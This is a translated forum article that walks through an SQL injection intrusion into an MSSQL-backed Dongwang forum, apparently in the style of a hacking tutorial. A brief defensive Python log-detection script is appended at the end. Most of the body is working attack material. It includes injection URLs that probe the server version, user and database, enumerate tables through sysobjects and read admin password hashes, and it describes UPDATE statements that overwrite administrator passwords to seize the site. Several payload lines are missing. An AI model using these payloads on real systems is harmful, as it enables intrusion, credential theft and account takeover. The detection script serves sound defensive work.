SQL injection intrusion into a Dongwang site (MSSQL)

  Editor preamble:
  I did not test this article, and it still rests on many preconditions: there must be other programs sharing the same SQL Server, and one has to assume that an injection vulnerability exists. After all, Dongwang itself has no fixed hole here; it is because of the openness of the Dongwang forum that people are familiar with its database structure, its programs and how it operates. The attack gains management rights step by step and then raises privileges gradually; if the database is using the sa account, it is even more trouble.
  It is precisely because of these assumed conditions that we need not be too nervous; this is an idealized intrusion scenario, and the program is presented to reduce our vulnerability and to draw every programmer's attention. Webmasters who combine various programs should pay attention to security and to the integrity of those programs.
  As far as I know, Dongwang versions after 7.0 sp2 have already had two or three such issues, so we should pay attention to timely upgrades and detailed permission settings. That is not to say Dongwang is bad; its code is open and used by many people, so many bugs get found, and the more a piece of software is used, the more bugs will turn up. Relatively speaking, I prefer custom-developed programs; comparatively, they tend to be somewhat more secure.

  Below, the current Dongwang version is the latest one, 7.0 sp2. Its security should be said to be quite high, so breaking it through flaws in its own scripts is no small difficulty. But we can take an indirect route from outside to get at Dongwang. The IIS + ASP + SQL Server 2000 combination is very common now, and a site that uses many ASP scripts is bound to slip up somewhere. If a host has a SQL injection point and also has the SQL version of Dongwang installed, you can basically conclude: that Dongwang is yours. Let's look at the example.
  First, the target. Assume the following URL has a SQL injection:

  http://www.loveyou.com/type.asp?id=6

  To test whether it is injectable, append a single quotation mark after the 6.
  Returns:
  Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
  [Microsoft][ODBC SQL Server Driver][SQL Server] Unclosed quotation mark before the character string ''.

  Continue by first detecting the system version:

  http://www.loveyou.com/type.asp?id=(select @@version)--

  Returns: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
  [Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (x86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int.
  It appears the latest SP4 patch is applied.

  The user currently connected to the database:

  http://www.loveyou.com/type.asp?id=(select user_name())--

  Returns: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
  [Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'webuser' to a column of data type int.
  From the error we learn that the current database user is: webuser

  The database currently connected to:

  http://www.loveyou.com/type.asp?id=(select db_name())--

  Returns: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
  [Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value '01city' to a column of data type int.
  From the error we learn that the current database is called: 01city
  Next, test the permissions. (Note: since our aim is to get the Dongwang system rather than to take over the database, the privilege level on the database is not very important to us.)


  http://www.loveyou.com/type.asp?id=(select is_srvrolemember('sysadmin'))--

  Returns an error message: the current record has been deleted. It seems the privilege really is not very high. Continue,

  Information is displayed normally, so the database connection seems to have db_owner (database owner) permission. That is more than sufficient for manipulating data.

  Second, get the database tables. The various Dongwang tables may well all exist in the current database, 01city.
  First get one table:

  http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in (''))--

  Returns: [Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'address' to a column of data type int.
  Yes, the first table is out: address
  Continue,

  Returns: admin. The second table is out too. By analogy, with:
  ...,'admin',...))--

  every table in the database can be listed.
  Before long all the tables are out, and the names look very familiar:
  address, admin, bbslink, bbsnews, board, user ... Anyone can tell that these are the Dongwang tables. Of course there are some other tables as well, but we won't bother with them.
  The next part is easy. There is no need to guess field names: open our own copy of the Dongwang database and look. With the table and field names in hand, you can do whatever you like in Dongwang within this permission. But please do not drop table! The damage would be too great. Our aim is to practise technique and raise our level. Good, now let's move on to the Dongwang back end.
  Third, enter the back end and obtain Dongwang forum administrator privileges.

  First look at how many administrators there are in the back end:

  Returns an error: the current record has been deleted. This shows there are fewer than four administrators. Submit directly,

  Information is displayed normally, so it appears there is only one administrator. Read out the administrator's name,

  Out it comes; the administrator who logs in to the back end is called: 01city
  Continue by reading out the back-end administrator's password:

  Very smoothly, the password is: e7cc01be0e33a273
  It is MD5-encrypted. Should we crack it? But wait, there is no need to crack the MD5 password.
  Because Dongwang's back-end management uses cookie session authentication, only a front-end administrator can log in to back-end management; an ordinary user cannot get into back-end management, even when the back-end username and password are known. So we have to obtain a front-end administrator username and password. This is easy: register a forum user and look at the management team. The front-end administrator user is: admin

  Good, get his password:

  http://www.loveyou.com/type.asp?id=(select userpassword from user where username='admin')--

  Returns: the front-end admin password is: e7cc01be0e33a273
  The MD5 is the same. We could now use cookie spoofing to log in as the front-end administrator. But is there another way? Don't forget that we now hold power of life and death over the database. The answer you are thinking of is right: update. We submit:

  Returns normally, so it should have executed successfully. Check:

  Return value: 49ba59abbe56e057
  The password was changed successfully. This 16-character MD5 was computed in advance, so its plaintext password is already known.
  Then, in the same way, change the back-end management password. First change the back-end user to the same name as the front-end user, with:

  Check:

  http://www.loveyou.com/type.asp?id=(select username from admin)--

  Change successful; the back-end administrator is now: admin. Then change the password, with:

  Check:

  http://www.loveyou.com/type.asp?id=(select password from admin)--

  Change successful; the back-end administrator password is now: 49ba59abbe56e057

  At this point Dongwang has completely fallen. You can log in to the front end as admin and then enter back-end management with the same password.
  Fourth, summary. Gaining control of Dongwang this way is not too difficult to achieve. This benign penetration test also exposed how terrible a SQL injection attack is. For IIS + ASP + SQL Server 2000 virtual hosts it is impossible to guard against everything: as long as any host on the server has a SQL injection point, Dongwang faces catastrophe. In fact, finding such a SQL injection point among the huge number of programs on a server is not difficult. As the old saying goes: a thousand-li dike collapses from an ant hole. So the best way to prevent this kind of attack is to strengthen the security of the code. Security is a whole; any minor error can lead to serious consequences.
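  The probes above share a recognisable shape in the web server log: a numeric parameter carrying a subselect, a server-information function or the sysobjects catalog, and a trailing comment terminator. The following Python script is an added example, not part of the original article, that flags such requests in IIS-style log lines; the log lines, field layout and signature names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures modelled on the probes in the article: server-info functions,
# the sysobjects catalog, subselects inside a numeric parameter, comment
# terminators and data-changing verbs. A lone single quote is a weak signal.
SIGNATURES = {
    "version_probe": re.compile(r"@@version"),
    "identity_probe": re.compile(r"\b(user_name|db_name|is_srvrolemember)\s*\("),
    "schema_enum": re.compile(r"\bsysobjects\b"),
    "select_subquery": re.compile(r"\(\s*select\b"),
    "comment_terminator": re.compile(r"(--|;)\s*$"),
    "data_change": re.compile(r"\b(update|insert|delete|drop)\b"),
    "quote": re.compile(r"'"),
}

# Constructed (trimmed) IIS W3C layout: date time c-ip cs-uri-stem cs-uri-query sc-status
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")

def normalize(query):
    """URL-decode, lower-case and collapse whitespace so 'id = (SELECT @@version)' and 'id=(select+@@version)' match alike."""
    return re.sub(r"\s+", " ", unquote_plus(query)).strip().lower()

def analyze_line(line):
    """Return (client_ip, uri_stem, status, [signature names]), or None if the line does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    _date, _time, ip, stem, query, status = m.groups()
    q = normalize(query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(q)]
    return ip, stem, int(status), hits

def find_injection_attempts(log_text, min_hits=2):
    """Flag requests that trip at least min_hits signatures; a stray quote alone does not alert."""
    rows = (analyze_line(l) for l in log_text.splitlines())
    return [r for r in rows if r and len(r[3]) >= min_hits]

# Constructed sample log (not from the article's target); the query strings
# mirror the article's probes, plus two benign requests from normal users.
SAMPLE_LOG = """\
2004-01-01 10:00:01 10.0.0.5 /type.asp id=6 200
2004-01-01 10:00:02 10.0.0.5 /type.asp id=6' 500
2004-01-01 10:00:03 10.0.0.5 /type.asp id=(select+@@version)-- 500
2004-01-01 10:00:04 10.0.0.5 /type.asp id=(select+user_name())-- 500
2004-01-01 10:00:05 10.0.0.5 /type.asp id=(select+top+1+name+from+sysobjects+where+xtype='u')-- 500
2004-01-01 10:00:06 10.0.0.9 /type.asp id=7 200
"""
```

  Pairing the flagged requests with the HTTP 500 responses that the verbose ODBC error pages produce gives a strong signal that the error-based enumeration shown above is under way.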
